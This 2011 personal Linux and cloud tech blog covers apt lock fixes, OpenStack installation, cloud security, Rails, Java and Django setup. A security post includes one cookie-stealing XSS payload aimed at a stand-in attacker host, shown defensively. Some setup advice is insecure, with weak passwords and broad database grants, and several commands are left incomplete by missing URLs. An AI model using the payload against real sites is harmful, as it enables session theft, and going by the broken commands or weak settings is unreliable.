Friday, December 16, 2011

E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable): how to fix it (solved)

As an administrator, newbie UNIX/Linux user, or developer/programmer, you may face a problem like this in your shell on Ubuntu/Debian when a package is broken, or when for some other reason something is holding /var/lib/dpkg/lock. The errors look like this:

root@pythongeek:~# apt-get update
E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable)
E: Unable to lock directory /var/lib/apt/lists/
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?

You can fix this problem in a few steps, without rebooting!

1) Type this in bash:

    sudo dpkg --configure -a

2) Then type:

    sudo killall apt-get apt aptitude adept synaptic

Your output will look like this:

root@pythongeek:~# sudo killall apt-get apt aptitude adept synaptic
apt-get: no process found
apt: no process found
aptitude: no process found
adept: no process found
synaptic: no process found

Note: if you face this problem during installation of any software/package, don't forget to accept the EULA (the user license agreement pop-up) when it appears during installation.

3) This final step is for when the last two attempts failed to release the lock.
Close all running package managers, and open a Konsole window.

type in bash

sudo rm /var/lib/dpkg/lock

Then type this in bash:

sudo dpkg --configure -a

To reinstall a broken package, type this in bash:

sudo apt-get install -f <package-name>



LHS as a source of information – and a source of inspiration – I hope you'll choose to act right now. Enjoy, and keep learning.

Sunday, December 11, 2011

Installing OpenStack on Ubuntu using Devstack, with ease, in only 15 minutes (Cloud Computing Part 2)

The Devstack script is a useful tool and a good tutorial for us.

It helped me learn how to install OpenStack (nova, glance, keystone and so on) from git, how to configure the components, and how to make them work well together. Devstack is very easy to use if you just want to set up an OpenStack environment for learning.

Remember, you need not install MySQL or anything else in advance; the script installs everything automatically.

Make sure your system is Ubuntu 11.10 server.
You can test it on a real machine, or in a VMware or VirtualBox desktop machine.

Make sure the virtualization switch is enabled in your BIOS settings.
You need to have two interfaces, i.e. eth0 and eth1.
$ sudo apt-get install bridge-utils     # install bridge utilities
$ vi /etc/network/interfaces
# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static

auto br100
iface br100 inet static
bridge_ports eth2
bridge_stp off
bridge_maxwait 0
bridge_fd 0

In this file, eth0 is your public network; you need it to connect to the internet. eth2 (on your system it may be eth1) is another network interface used for the bridge (br100). It carries your private IPs and does not need to connect to any other network in our test; just choose a private network range and remember it.

$ sudo apt-get install git
$ git clone git://
$ cd devstack
$ vi localrc
add these info into localrc
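The exact localrc contents were lost from this post. As a rough sketch only, a minimal localrc of the devstack era looked something like the following; the variable names below are my recollection of devstack's conventions and should be checked against the `` shipped with your devstack checkout:

```shell
# Hypothetical minimal localrc -- verify names against your devstack's
ADMIN_PASSWORD=123456
MYSQL_PASSWORD=123456
RABBIT_PASSWORD=123456
SERVICE_PASSWORD=123456
FLAT_INTERFACE=eth1       # the private/bridge interface described above
```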


$ ./

It will ask for some passwords. Remember not to use special characters like $*_.! and so on; you can simply set a password like 123456.
Then the installation begins; how long it takes depends on your network bandwidth. If it fails because of the network or some other reason, look at the error log carefully, delete /opt/stack/devstack, and run the stack script again.

At the end, you will see a success message, and you can then type your IP into your browser. Enjoy your OpenStack time; it is a good thing, and there is always more to learn. Finally, you are here.

Looking for help or technical support? Feel free to mail me.




Creating a Private Cloud using OpenStack on Ubuntu, Manually (Cloud Computing Part 1)

This article is dedicated to developers, project leaders and cloud architects. I am going to explain how to set up a cloud using the command line. It is useful for newbies to both cloud and UNIX!

I am using Ubuntu 11.10 (64-bit server), so let's play with the shell!

For setting up a perfect cloud you need a minimum of two NICs on your hardware, and a lot of public IPs. :)

But I am setting it up on one NIC, with one IP (students and testers with fewer resources can go this way). :)

We are setting it up with OpenStack.
The official site of this document is below:

Ubuntu 11.10 environment deployment, using the FLATDHCP network mode:

public interface: eth0, used to connect to the user
private interface: eth1, bridged as br100, used for connections to the other nodes, keystone, glance, volume and so on

Start from a minimal Ubuntu install.

Remember to have openssh-server installed. We created a regular user, openstack,

and gave it NOPASSWD sudo privileges, to make the later operations easier.

$ sudo apt-get update                   # update the package tree
$ sudo apt-get install bridge-utils     # install the bridge components

Configure the network:
$ vi /etc/network/interfaces      # (GUI fans can use gksudo gedit instead of vi)

auto eth0
iface eth0 inet static

auto br100
iface br100 inet static
bridge_ports eth1
bridge_stp off
bridge_maxwait 0
bridge_fd 0

$ sudo /etc/init.d/networking restart

The initial preparatory work is done; the next step is to install nova, glance and the other components.

$ sudo apt-get install -y rabbitmq-server                 # install the MQ message component
$ sudo apt-get install -y python-greenlet python-mysqldb  # install the Python dependencies

Next, install the various nova components and dependencies:

$ sudo apt-get install nova-volume nova-vncproxy nova-api nova-ajax-console-proxy
$ sudo apt-get install nova-doc nova-scheduler nova-objectstore
$ sudo apt-get install nova-network nova-compute
$ sudo apt-get install glance

Install euca2ools and unzip:
$ sudo apt-get install -y euca2ools unzip

Next we install the database. I chose MySQL, though personally I feel PostgreSQL is actually better.
$ sudo su -                          # change to the root user
# MYSQL_PASS=nova                    # the password for the MySQL root user
# NOVA_PASS=notnova                  # change nova and notnova to your own values
# cat <<MYSQL_PRESEED | debconf-set-selections
mysql-server-5.1 mysql-server/root_password password $MYSQL_PASS
mysql-server-5.1 mysql-server/root_password_again password $MYSQL_PASS
mysql-server-5.1 mysql-server/start_on_boot boolean true
MYSQL_PRESEED
# apt-get install -y mysql-server
# exit                               # exit the root environment

$ sudo sed -i 's/' /etc/mysql/my.cnf    # modify the my.cnf configuration file
$ sudo service mysql restart

$ MYSQL_PASS=nova        # set the passwords once more as ordinary-user environment variables
$ NOVA_PASS=notnova
$ sudo mysql -uroot -p$MYSQL_PASS -e 'CREATE DATABASE nova;'

// (This creates the database named nova. I recommend new users keep the name nova; if you use another name here, the nova configuration file will also need to change.)
$ sudo mysql -uroot -p$MYSQL_PASS -e "GRANT ALL PRIVILEGES ON *.* TO 'nova'@'%' WITH GRANT OPTION;"
$ sudo mysql -uroot -p$MYSQL_PASS -e "SET PASSWORD FOR 'nova'@'%' = PASSWORD('$NOVA_PASS');"

At this point, the installation of nova and glance is complete; next comes the configuration.

nova configuration
$ sudo vi /etc/nova/nova.conf
--dhcpbridge_flagfile=/etc/nova/nova.conf
--dhcpbridge=/usr/bin/nova-dhcpbridge
--logdir=/var/log/nova
# /data/openstack/nova is a new volume and directory; make sure it exists and belongs to the nova user
--state_path=/data/openstack/nova
# change the default location where instances are stored
--instances_path=/data/openstack/nova/instances
--lock_path=/var/lock/nova
--force_dhcp_release=True
--use_deprecated_auth
--iscsi_helper=tgtadm
--verbose
--scheduler_driver=nova.scheduler.simple.SimpleScheduler
--network_manager=
# my IP address on the internal network
--my_ip=
--public_interface=eth0
#--vlan_interface=eth0
--sql_connection=mysql://nova:notnova@localhost/nova
--libvirt_type=kvm
#--osapi_extensions_path=/opt/nova/bin/openstackx/extensions
#--vncproxy_url=
#--vncproxy_wwwroot=/data/stack/noVNC/
--api_paste_config=/etc/nova/api-paste.ini
--image_service=nova.image.glance.GlanceImageService
--ec2_dmz_host=
--ec2_url=
--rabbit_host=localhost
--glance_api_servers=
--flat_network_bridge=br100
--flat_interface=eth1
# where instance IP allocation starts (from .51), though this option did not seem to work
--flat_network_dhcp_start=
# the network segment for the instances
--fixed_range=
--flat_injected=False
# use multi_host
--multi_host=1
# instances use the virtio NIC model
--libvirt_use_virtio_for_bridges
#--start_guests_on_host_boot=true
#--resume_guests_state_on_host_boot=true
--use_ipv6=false
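For clarity, nova.conf of this era is a plain flag file: one --key=value (or bare --flag) per line, with '#' commenting a line out. The sketch below is not nova's actual parser, just an illustration of the format:

```python
def parse_flagfile(text):
    """Toy parser for a gflags-style flag file: --key=value or bare --flag,
    '#' comments a line out. Illustration only."""
    flags = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("--"):
            continue  # skip blanks and '#' comments
        key, sep, value = line[2:].partition("=")
        flags[key] = value if sep else True  # bare flags are booleans
    return flags

sample = """--logdir=/var/log/nova
--verbose
#--use_ipv6=false"""
conf = parse_flagfile(sample)
print(conf["logdir"], conf["verbose"])  # /var/log/nova True
```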

$ sudo vi /etc/glance/glance-api.conf
// (In this file, since we are not using keystone, modify the filesystem_store_datadir parameter according to your needs, to point at the directory where you want to store images; of course, its owner should be changed to the glance user.)
$ sudo vi /etc/glance/glance-registry.conf
// (In this file you can modify the sql_connection parameter to point at your database, or leave it unchanged.
If you do modify it to use MySQL, make sure the corresponding database exists in MySQL.)

sql_connection = mysql://nova:notnova@localhost/glance    # this is my configuration; I created a glance database in MySQL

$ sudo chown -R root:nova /etc/nova      # change the owner of /etc/nova
$ sudo chmod 640 /etc/nova/nova.conf

Restart all services:
$ sudo restart libvirt-bin
$ sudo restart nova-network
$ sudo restart nova-compute
$ sudo restart nova-api
$ sudo restart nova-objectstore
$ sudo restart nova-scheduler
$ sudo restart glance-registry
$ sudo restart glance-api
Note: we do not start nova-volume. Although we installed it, nova-volume needs a dedicated volume group (vg), and we have not configured one, so it will not come up.

nova-network and nova-compute may also fail to start at this point; do not worry about that for now.

Next, we configure nova's operating environment:
$ sudo nova-manage db sync
nova-manage user admin <user_name> creates a user; for example:
$ sudo nova-manage user admin test
On success it prints something like:
export EC2_ACCESS_KEY=d6aa7747-4324-4abc-9604-4f7d6a2f8f3f
export EC2_SECRET_KEY=2b204b75-da2d-47b8-ba7a-611d71f0ecbf

nova-manage project create <project_name> <user_name> creates a project owned by the user we just built; for example:
$ sudo nova-manage project create test-proj test
nova-manage network create --help shows how to create an instance network; for example:
$ sudo nova-manage network create --label=test-net --fixed_range_v4= --num_network=1 --network_size=256

Start the services that failed earlier:
$ sudo start nova-network
$ sudo start nova-compute
$ sudo start nova-scheduler
After starting each service it is best to look at its log, e.g. sudo tail -f /var/log/nova/nova-network.log, to make sure there are no errors. You can also use ps aux | grep [n]ova-network to confirm the service is running. If starting a service fails, fix the cause first; afterwards, use sudo start rather than sudo restart.

Well, the compute environment is now deployed. We can check its state with:
$ sudo nova-manage service list
$ sudo nova-manage network list

Next, create credentials, so that we can use the euca tools:
$ cd
$ mkdir creds
$ sudo nova-manage project zipfile test-proj test creds/
$ unzip creds/ -d creds/
$ source creds/novarc

OK, done. We can try the tools:
$ euca-describe-availability-zones verbose
AVAILABILITYZONE  nova  available
AVAILABILITYZONE  |- nova-network  enabled :-) 2011-10-17 04:45:44
AVAILABILITYZONE  |- nova-compute  enabled :-) 2011-10-17 04:45:45
AVAILABILITYZONE  |- nova-scheduler  enabled :-) 2011-10-17 04:45:46

So far, the services are enabled successfully. If you find a service is not working, use ps aux | grep nova to check whether it is up, and examine the per-service log files in the /var/log/nova/ directory closely for further information.

Then we can use kvm to create an image:

$ sudo apt-get install kvm-pxe     # install this, otherwise kvm prints a warning at run time
$ kvm-img create -f raw server.img 5G
$ sudo kvm -m 1024 -cdrom rhel5.iso -drive file=server.img,if=virtio,index=0 -boot d -net nic -net user -nographic -vnc :0

Here we use the RHEL 5 (Red Hat) ISO. After running this command, you can use VNC to connect to your server, e.g. ssvncviewer your-server-ip:0.
Over VNC you will see the installation interface. After the installation, write the following block at the beginning of /etc/rc.local in the RHEL image:
modprobe acpiphp

# Simple attempt to get the user ssh key using the meta-data service
mkdir -p /root/.ssh
echo >> /root/.ssh/authorized_keys
curl -m 10 -s | grep 'ssh-rsa' >> /root/.ssh/authorized_keys
echo "************************"
cat /root/.ssh/authorized_keys
echo "************************"
Save and exit; the image is now ready.

Upload the image using glance:
$ glance --verbose add name="rhel5" disk_format=raw is_public=true < server.img
You should also watch the registry and api logs under /var/log/glance/.
$ glance index     # see the list of images

Start your instance:
$ euca-describe-images
You can now view the image; the output is similar to:
IMAGE ami-00000003 server.img
Remember this image number, ami-00000003.
$ euca-run-instances -t m1.tiny ami-00000003     # start an instance of the ami-00000003 image
-t specifies the instance type, which determines the cpu, memory, disk size, etc.
Watch the output of /var/log/nova/nova-api.log, nova-scheduler.log, nova-compute.log and nova-network.log; you can also use vnc to connect to serverip:0 and watch the instance console.
Use the command $ euca-describe-instances to see your current instances. The first instance will be relatively slow to start, because the image needs to be copied from glance into nova's instances directory.

Conclusion: nova is currently growing fast, and some features of the diablo release are still being completed. The development version of nova integrates better with keystone, novaclient, dashboard and some other projects, which makes OpenStack more robust. Friends who are interested can use the repo installation in a production environment, and test development versions in a test environment. Since I install the git development version in production, I will cover the fuller integration of the development versions in a follow-up. Of course, using the development version brings more trouble, but also more fun and hands-on practice, and a deeper understanding of how it all works.

Looking for help or technical support? Feel free to mail me.





Sunday, November 20, 2011


Even though the cloud continues to grow in popularity and respectability, complications with data privacy and data protection still plague the market. There is a long way to go before cloud becomes mainstream, and there are obstacles on the road. Data security is a concern for any enterprise, and cloud computing often magnifies security anxieties. Adopting a few ground rules will help protect users, their data and your overall cloud investment.

Cloud computing is being accepted by corporations everywhere, and it is now one of the fastest-emerging technologies in the field of Information Technology (IT). Yet companies, from startups to experienced firms, often lack the protective measures to weather an attack on their servers, due to scarcity of resources:
  • Poor programming skills that expose software vulnerabilities in Python, Ruby, PHP or JavaScript.
  • Even some good programmers are unaware of cyber security, so companies need hybrid developers (security skills + good programming).
  • Ports left open on firewalls, or insufficient security knowledge among system administrators; knowledge of Nmap, Nessus and Snort should be mandatory for system administrators before cloud-based firms hire them.
  • Companies that are encouraged to pursue cloud computing must be able to support their own hardware backbone.

Because of ineffective security policies, many startups and firms are afraid to adopt cloud computing. But there is a way to rescue security in the cloud: companies should keep the four points above in mind when they hire people for their cloud operations.


The basic definition of information security has three aspects, referred to in the corporate world as confidentiality, integrity and availability; these are the major security issues for cloud vendors.

Confidentiality means that the storage of encryption keys must be secured from ordinary users and employees, and permitted only to the officials responsible for operations.

Integrity means every firm needs policies ensuring no data exchange happens outside a strict set of rules and protocols. On the client side, be aware: do not store sensitive data and passwords that can be stolen easily.

Availability is a major concern of security experts; many large caps in cloud computing have already experienced downtime. The relationship should be only between clients and provider, with no third parties. Authentication protocols also need strengthening: they should be backed by several methods combining hardware and passwords, or even face recognition and fingerprints. SSL has been broken by some attackers, so these protocols deserve attention; even Amazon has faced a denial-of-service attack.

Untrustworthy suppliers, eavesdropping, impersonation, data theft, lack of performance, and logical and physical disasters are addressed by this pattern. Consider checking supplier applications for cross-site scripting (XSS) attacks, which can be used to log keystrokes, capture data, and propagate web application worms such as Samy. Feed injection in RSS and Atom can let an attacker compromise applications if feeds are not properly secured.
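As a minimal illustration of the XSS defence mentioned above, untrusted input must be escaped before it is echoed back into a page. This Python sketch uses the standard library; real frameworks such as Django do this in their template engines.

```python
import html

# A script an attacker tries to inject through a form field or feed entry.
payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Escaping turns the markup into inert text before it reaches the browser.
safe = html.escape(payload)
print(safe.startswith("&lt;script&gt;"))  # True: the tag can no longer execute
```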

All programmers should go through some relevant technologies that are safer than others, such as Django in Python, AJAX, RSS, JSON, Gears in Java, SOAP (Simple Object Access Protocol), and REST (Representational State Transfer).


Information privacy is the interest an individual has in controlling, or at least significantly influencing, the handling of data about themselves. We need to ensure data stays between the clients and the provider only, but how?

  • Ensure the security of MapReduce for privacy and confidentiality using Airavat; our main aim here is to provide privacy assurances for sensitive data.
  • Use a system model in which data providers keep their own data sets and the cloud provider runs the Airavat framework.
  • Assess the trustworthiness of data providers using a threat model.
  • Split the MapReduce computation model into input chunks, so that the mapper and the reducer each work on separate functions and chunks of the input and output.
  • The concept of differential privacy can be used to ensure privacy; random Laplacian noise, or other noise algorithms, can be implemented at design time.
  • A function-sensitivity algorithm can be used when designing the cloud architecture model, together with new policies such as SELinux and a MAC model at the core of any cloud access control.
  • Also consider security technologies (OpenID, .NET Access Control, PKI), load monitoring and testing (Soasta, Hyperic), and provisioning and configuration management.
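The Laplacian-noise idea in the list above can be sketched as a toy version of the Laplace mechanism from differential privacy. The inverse-CDF sampling below is the standard construction, but treat the function as illustrative, not production-ready:

```python
import math
import random

def laplace_noise(sensitivity, epsilon):
    """Draw one sample of Laplace(0, b) noise, b = sensitivity / epsilon,
    via inverse-CDF sampling."""
    b = sensitivity / epsilon
    u = random.random() - 0.5            # uniform on [-0.5, 0.5)
    sign = 1.0 if u >= 0 else -1.0
    return -b * sign * math.log(1.0 - 2.0 * abs(u))

# A private count query: release the true count plus calibrated noise.
true_count = 42
noisy_count = true_count + laplace_noise(sensitivity=1.0, epsilon=0.5)
print(noisy_count)
```

A smaller epsilon means more noise and stronger privacy; the noise is centered on zero, so averages over many queries stay close to the truth.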

Basic network security covers performance, bandwidth, quality, availability and flexibility across networks, reconfiguration of the network per client (Network as a Service, NaaS), and virtualization of the cloud network for users.

  • Provide the basic network functions for applications with highly variable demands.
  • Integrate network functionality with computing and storage whose demands vary seasonally, with peak requirements.
  • Integrate the necessary management and security tools, such as Snort, Nmap, tcpdump, etc.


Security as a service can be used to ensure security in the cloud. Run anti-virus on both sides of the cloud, vendor and client; multiple versions of anti-virus can be used to ensure proper protection from malware.

  • Reduce the number of possible bugs; contribute to open source so you can benefit from the community.
  • Have multiple programmers implement functionally equivalent components independently, and use multiple scanners in parallel to increase the detection rate.
  • Use cloud forensics, and prefer services with no vendor lock-in for better productivity, so that clients are never stuck with one vendor's service.
  • Improve the system architecture: include specific protocols on both sides for the end users, and use a hash technique to derive a unique host and user ID from the MAC address.
  • Require certification and third-party audits of the provider.

Despite the numerous security issues involved in cloud computing, it is critical that industry and organizations take a thoughtful and proactive approach to the cloud. Since we need it as a basic utility in daily use, we need to ensure its security. The following suggestions will help secure your cloud:

  • Secure architecture model: applications need to be integrated for the security-architecture community. The important entities in the data flow are end users, developers, system architects and auditors. Integrate every application-level tool into the architecture, so that the grid concept of security can be applied step by step.
  • End users: use protocols and policies committed to ensuring security while resources are accessed from the cloud. Use signatures and tokens on the server side; on the client side use firewalls and entry-point protocols, and update regularly so that bugs are patched as soon as possible. Also ensure transport security using TLS/SSL and secure IPsec.
  • System architects: these people must be employed under definite policies, and should know the basic security concepts and tools needed to protect a cloud. They also need to write the policies that govern installation and configuration of hardware components such as firewalls, servers, routers, operating systems, proxy server configurations and encryption tunnels.
  • Developers: developers must be well versed in security concepts. They may want extra virtual machines to generate test data, or to analyse, process and penetration-test their code. Monitoring of API calls in server requests for the software must be included in the architectural model.





Sunday, October 2, 2011

Setting up your first Rails project on Ubuntu 11.04

Installing Ruby and RubyGems from the Terminal
sudo apt-get install ruby-full
tar -xvf rubygems-1.3.7.tgz
cd rubygems-1.3.7/
sudo ruby setup.rb
sudo ln -s /usr/bin/gem1.8 /usr/bin/gem
sudo gem install rdoc
sudo gem install rails

Looking for Ruby 1.9.2?
I recommend version 1.8 as above, but if anybody is looking for 1.9.2, install the following (this assumes RVM is already installed):

$ sudo apt-get install curl bison build-essential autoconf zlib1g-dev \
    libssl-dev libxml2-dev libreadline6-dev git-core subversion
$ rvm package install openssl
$ rvm package install readline
$ rvm install 1.9.2 -C --with-openssl-dir=$HOME/.rvm/usr,--with-readline-dir=$HOME/.rvm/usr

Installing MySQL Server from Terminal
sudo apt-get install mysql-server libmysqlclient-dev libmysql-ruby
Setting up your first Rails project
It seems that Rails 3 depends on sqlite3 even if you don’t intend to use it as the backend for your application. We’ll create an example rails project  to make sure everything is working.
sudo apt-get install libsqlite3-dev build-essential
rails new vikas
cd vikas/
 sudo bundle install
sudo rake db:create
rails s
When you run rake db:create, you may hit the same kind of problem that I faced:

 sudo rake db:create
rake aborted!
Could not find a JavaScript runtime. See for a list of available runtimes.

So no need to worry; just install Node.js from the Terminal:
sudo apt-get install python-software-properties
sudo add-apt-repository ppa:chris-lea/node.js
sudo apt-get update
sudo apt-get install nodejs

The same kind of problem also occurs with Heroku and Ruby, so just install Node.js as above.
Now fire up your browser and go to http://localhost:3000, and you should be greeted with a nice little Rails homepage.

Sunday, September 25, 2011

How to install UNetbootin and the default Java JDK on Ubuntu/Debian: things you can't easily find on Google

If you are a programmer looking for a portable way to install a live system for any Linux, you need UNetbootin to put it on a USB stick. I also searched Google a lot for these things, so I thought I should write them up on my blog for my friends.

For Ubuntu 9.10 and higher
Open a command terminal to install UNetbootin from the PPA:
sudo add-apt-repository ppa:gezakovacs/ppa
sudo apt-get update
sudo apt-get install unetbootin
The Java JDK is recommended if you are using Hadoop, Eclipse or any kind of Java application; it provides the build environment and improves performance. So for developers, coders, programmers and hackers, here is how to install it on Ubuntu and make it the default. In Ubuntu 11.04 and Ubuntu 10.04 LTS, the package sun-java6-jdk has been dropped from the Multiverse section of the Ubuntu archive, so you have to perform the following four steps to install it:
1. Add the Canonical Partner Repository to your apt repositories:
$ sudo add-apt-repository "deb lucid partner"
2. Update the source list:
$ sudo apt-get update
3. Install sun-java6-jdk:
$ sudo apt-get install sun-java6-jdk
4. Select Sun's Java as the default on your machine:
$ sudo update-java-alternatives -s java-6-sun
The full JDK will be placed in /usr/lib/jvm/java-6-sun (on Ubuntu this directory is actually a symlink).
After installation, make a quick check whether Sun's JDK is correctly set up:
user@ubuntu:~$ java -version
java version "1.6.0_20"
Java(TM) SE Runtime Environment (build 1.6.0_20-b02)
Java HotSpot(TM) Client VM (build 16.3-b01, mixed mode, sharing)

Thursday, August 18, 2011

TDD and Pair Programming :- A New Industry approach to better productivity & performance

The combination of TDD and pair programming is a new approach that professionals are bringing into industry these days.

1) What are TDD and pair programming?
TDD is test-driven development, and pair programming is the pairing of two (or more) programmers at the same machine. Together they can help increase your productivity and performance.

2) Why TDD and pair programming?
1) They increase motivation to develop individual programming skills.
2) After acquiring these skills, programmers can demonstrate them under controlled, exam-like conditions.
3) They provide an accurate gauge, and practical exercise, of individual programming ability.
4) They also give professionals a valuable assessment tool.
5) They increase the productivity and performance of the individual.
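A minimal sketch of the TDD cycle in Python (the function and names here are invented for illustration): write a failing test first, then write just enough code to make it pass, then refactor.

```python
import unittest

# Step 2: the "production" code, written only after the test below
# existed and failed.
def fizzbuzz(n):
    if n % 15 == 0:
        return "FizzBuzz"
    if n % 3 == 0:
        return "Fizz"
    if n % 5 == 0:
        return "Buzz"
    return str(n)

# Step 1: the test, written first. In pair programming, one partner often
# writes the test while the other writes the code to satisfy it.
class TestFizzBuzz(unittest.TestCase):
    def test_multiples(self):
        self.assertEqual(fizzbuzz(3), "Fizz")
        self.assertEqual(fizzbuzz(5), "Buzz")
        self.assertEqual(fizzbuzz(15), "FizzBuzz")
        self.assertEqual(fizzbuzz(7), "7")

unittest.main(exit=False, argv=["tdd-demo"])
```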

Looking for a lab session link? Here are some university lab-session links that will help you a lot:



3) For agile software development, especially for Ruby

4) Especially for JavaScript or Dojo

Some more documentation links for understanding it and implementing it in your university, company, organization or firm:




Braught, G., Eby, L. & Wahls, T. (2008). The Effects of Pair-Programming on Individual Programming Skills. In Proceedings of the thirty ninth ACM-SIGCSE Technical Symposium on Computer Science Education. (pp. 200-204). (Also appears in: ACM SIGCSE Bulletin, 40(1), 200-204.)

Braught, G. & Wahls, T. (2008). Teaching Objects in Context. Journal of Computing Sciences in Colleges, 23(5), 101-109.

Braught, G., Wahls, T. and Ziantz, L. (2007). Assessing The Effects of Pair-Programming on Individual Ability: Results from the First Year of a Two-Year Study. Faculty Poster Session, The thirty eighth ACM-SIGCSE Technical Symposium on Computer Science Education. Covington KY, March 7-10, 2007.

G. Braught, T. Wahls & Ziantz, L. Integration and Assessment of Pair Programming, Unit Testing and Lab Practica in an Introductory Computer Science Course. NSF CCLI Showcase at SIGCSE07, Covington, KY, March 7-10, 2007.

Monday, May 16, 2011

CS 201 Python/Django Summer 2011

Vikash Ruhil
11am to 5pm
Room No 1
School of Computer and System Sciences
JNU NEW Campus
How to Reach

By Delhi Metro: Hauz Khas Metro station
(JNU is about 1 km from Hauz Khas Metro station)
vikasruhil06 at


30th July 2011 (1-day boot camp)
1) Come with your laptop.
2) Better if you have Linux/Mac as your OS.
3) For Windows, no more support after the bootcamp.
4) Training is free, but no other services are provided, i.e. come ready with your own food.
5) Also send me a mail confirming your attendance, with a short bio and why you want to attend and learn Django!
6) Please bring a printed copy of our confirmation mail, so that we can ensure your space over there.
7) So, meet @ JNU

1) Django introduction and basic concepts
2) Web development (Django vs web2py: which is better?)
3) Google App Engine
4) Creating a Facebook app using GAE + Django
5) Web server setup & usage
6) Database setup & usage
7) ORM (Object Relational Mapping) + templates (for views) + forms + much more
Some updates soon.
Course mailing list: a list server is used to email important messages to students in the course. Coming soon!
Other prerequisites: graduate standing, the ability to install software, learn material quickly and find solutions to problems; read the following resources to stay updated.

What's django

● “Django is a high-level Python Web framework
that encourages rapid development and clean,
pragmatic design.”
● DRY (Don't Repeat Yourself)
● ORM (Object Relational Mapping) + Templates
(for views) + Forms + Much more

Getting Started

Before using Django you need to be sure Python is installed. Django works with any version of Python between 2.4 and 2.7. If you followed the directions for ps6 and installed Python, you are already set for this. Otherwise, follow the directions in the Python Guide to install Python first.

Installing Django on Windows
  1. Download and install 7-Zip (or some other zip utility that supports tar files such as WinZip)
  2. Download Django 1.1:
  3. Unpackage the Django tarball file. If you have WinZip, this should happen automatically when you open the downloaded file. If you have installed 7-Zip, start the 7-Zip file manager and select the Django-1.1.1.tar.gz file you downloaded. Then, select "Extract" and select the directory where you want to extract the files.
  4. Open a Windows Command Shell and go to the unzipped folder. You can open the command shell by running "cmd.exe" or by selecting "All Programs | Accessories | Command Prompt" from the Start menu. Once you have the command shell, assuming that the folder was extracted to your desktop the command to use is:
    in Windows XP: cd C:\Documents and Settings\[username]\Desktop\Django-1.1.1
    in Windows Vista: cd C:\Users\[username]\Desktop\Django-1.1.1
    where [username] is your personal folder.
  5. Run the command: python install [If you get errors for this, mail me!]
  6. Django is now installed!
Installing Django on Mac
  1. Download Django 1.1:
  2. Double-click the Django tarball file. This should automatically unzip the file. Place the file on your desktop for simplicity.
  3. Open your "Terminal". This is similar to "Run" on a Windows PC. At the command line, type the following command and hit enter: cd /Users/[YOUR_NAME]/Desktop/Django-1.1.1
  4. Type the following command: sudo python setup.py install. You will be required to enter your password. When you type your password, your keystrokes are read but will not appear in the Terminal. Type your password carefully and then hit enter.
  5. Django is now installed!

    Frequently Asked Questions
  6. How do I run a Windows command shell? In Windows 7, select the Start menu and enter "cmd.exe" in the Search box.
    In other versions of Windows, select "Start | All Programs | Accessories" and select "Command Prompt".
  7. How do I run python? When I try to run python, I get an error like:
    ] python setup.py install
    'python' is not recognized as an internal or external command,
    operable program or batch file.
    The problem is python is not on your Windows command path. To add the Python directory to your Windows path, open the Control Panel and select System and "Advanced System settings". Select "Environment Variables". Edit the "Path" variable to add the directory containing python. For example, if the current value of "Path" is
    C:\Program Files (x86)\CVSNT\;C:\Program Files(x86)\texlive\2008\\bin\win32
    and you installed Python in C:\Python26, edit the "Path" variable value to be:
    C:\Program Files (x86)\CVSNT\;C:\Program Files(x86)\texlive\2008\\bin\win32;C:\Python26
    An easier (temporary) workaround for this, is to just type the full path to run python:
    ] C:\Python26\python setup.py install
  8. How should I read in data from a file? If the data in your file is separated into lines, and the elements in each entry separated by commas (this is what is known as a "comma-separated values" or csv file), the easy way to read in the data is:
    f = open(filename, 'r')
    for line in f:
        entries = line.split(",")
        ### entries is now a Python list of the elements in that line
    If you have data to pre-seed your database with, it is a good idea to store it in a file and use code like this to read it in. Then, from the entries you would need to construct the relevant model object and save() it to store it in the database.

Django and Python development online and printed resources



Editors and IDEs

Web server setups

Database setups

Templating Engines


Example Django applications

There is a lot of open source Django code available online. Reading the source of established Django projects can be a great way to learn more about the framework. Our recommended starting points include:

Google App Engine

Google App Engine Helper for Django

Online Videos


General Documentation




Testing and Documentation Tools



Web Servers and Modules



Text Formatting


Web browsers

Revision control

Issue Tracking

Text editors

JavaScript Libraries

JavaScript Object Notation (JSON)

Source Code Syntax Highlighters

Test tools



Python Books

Reference (these books freely distributed during the course-ware studies )

  • Python Phrasebook
    • Brad Dayley, Sams, 2006
  • Python in a Nutshell, 2nd ed.
    • Alex Martelli, O'Reilly, 2006
  • Python Essential Reference, 3rd ed.
    • David M. Beazley, Sams, 2006
  • Python Cookbook, 2nd ed.
    • (ed.) A. Martelli, A. Ravenscroft, D. Ascher, O'Reilly, 2005
  • Python Pocket Reference, 3rd ed.
    • Mark Lutz, O'Reilly, 2005

Saturday, April 30, 2011

how to kill zombie (Bots) ?

What is zombie?
A zombie computer (often shortened to zombie) is a computer connected to the Internet that has been compromised by a cracker, computer virus, or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction. The spammer controls and uses your PC without your knowledge, often to send unsolicited (and possibly offensive) email offers for products and services. Spammers use home computers to send bulk email by the millions. Because the zombie is planted on hundreds of computers belonging to unsuspecting third parties and then used to spread spam, it becomes very difficult to trace the zombie's creator. Zombies can also be used to launch a mass attack on a company or website.


Killing Zombies
Recall that if a child dies before its parent calls wait, the child becomes a zombie. In some applications, a web server for example, the parent forks off lots of children but doesn't care whether the child is dead or alive. For example, a web server might fork a new process to handle each connection, and each child dies when the client breaks the connection. Such an application is at risk of producing many zombies, and zombies can clog up the process table.
When a child dies, it sends a SIGCHLD signal to its parent. The parent process can prevent zombies from being created by creating a signal handler routine for SIGCHLD which calls wait whenever it receives a SIGCHLD signal. There is no danger that this will cause the parent to block because it would only call wait when it knows that a child has just died.
There are several versions of wait on a Unix system. The system call waitpid has this prototype

#include <sys/types.h>
#include <sys/wait.h>

pid_t waitpid(pid_t pid, int *stat_loc, int options)
This functions like wait in that it waits for a child to terminate, but it allows the process to wait for a particular child by setting its first argument to the pid that we want to wait for. However, that is not our interest here: if the first argument is set to -1, it will wait for any child to terminate, just like wait. The third argument can be set to WNOHANG, which causes the function to return immediately if there are no dead children. It is customary to use this function rather than wait in the signal handler. Here is some sample code:

#include <sys/types.h>
#include <stdio.h>
#include <signal.h>
#include <sys/wait.h>
#include <unistd.h>

void zombiekiller(int n)
{
  int status;
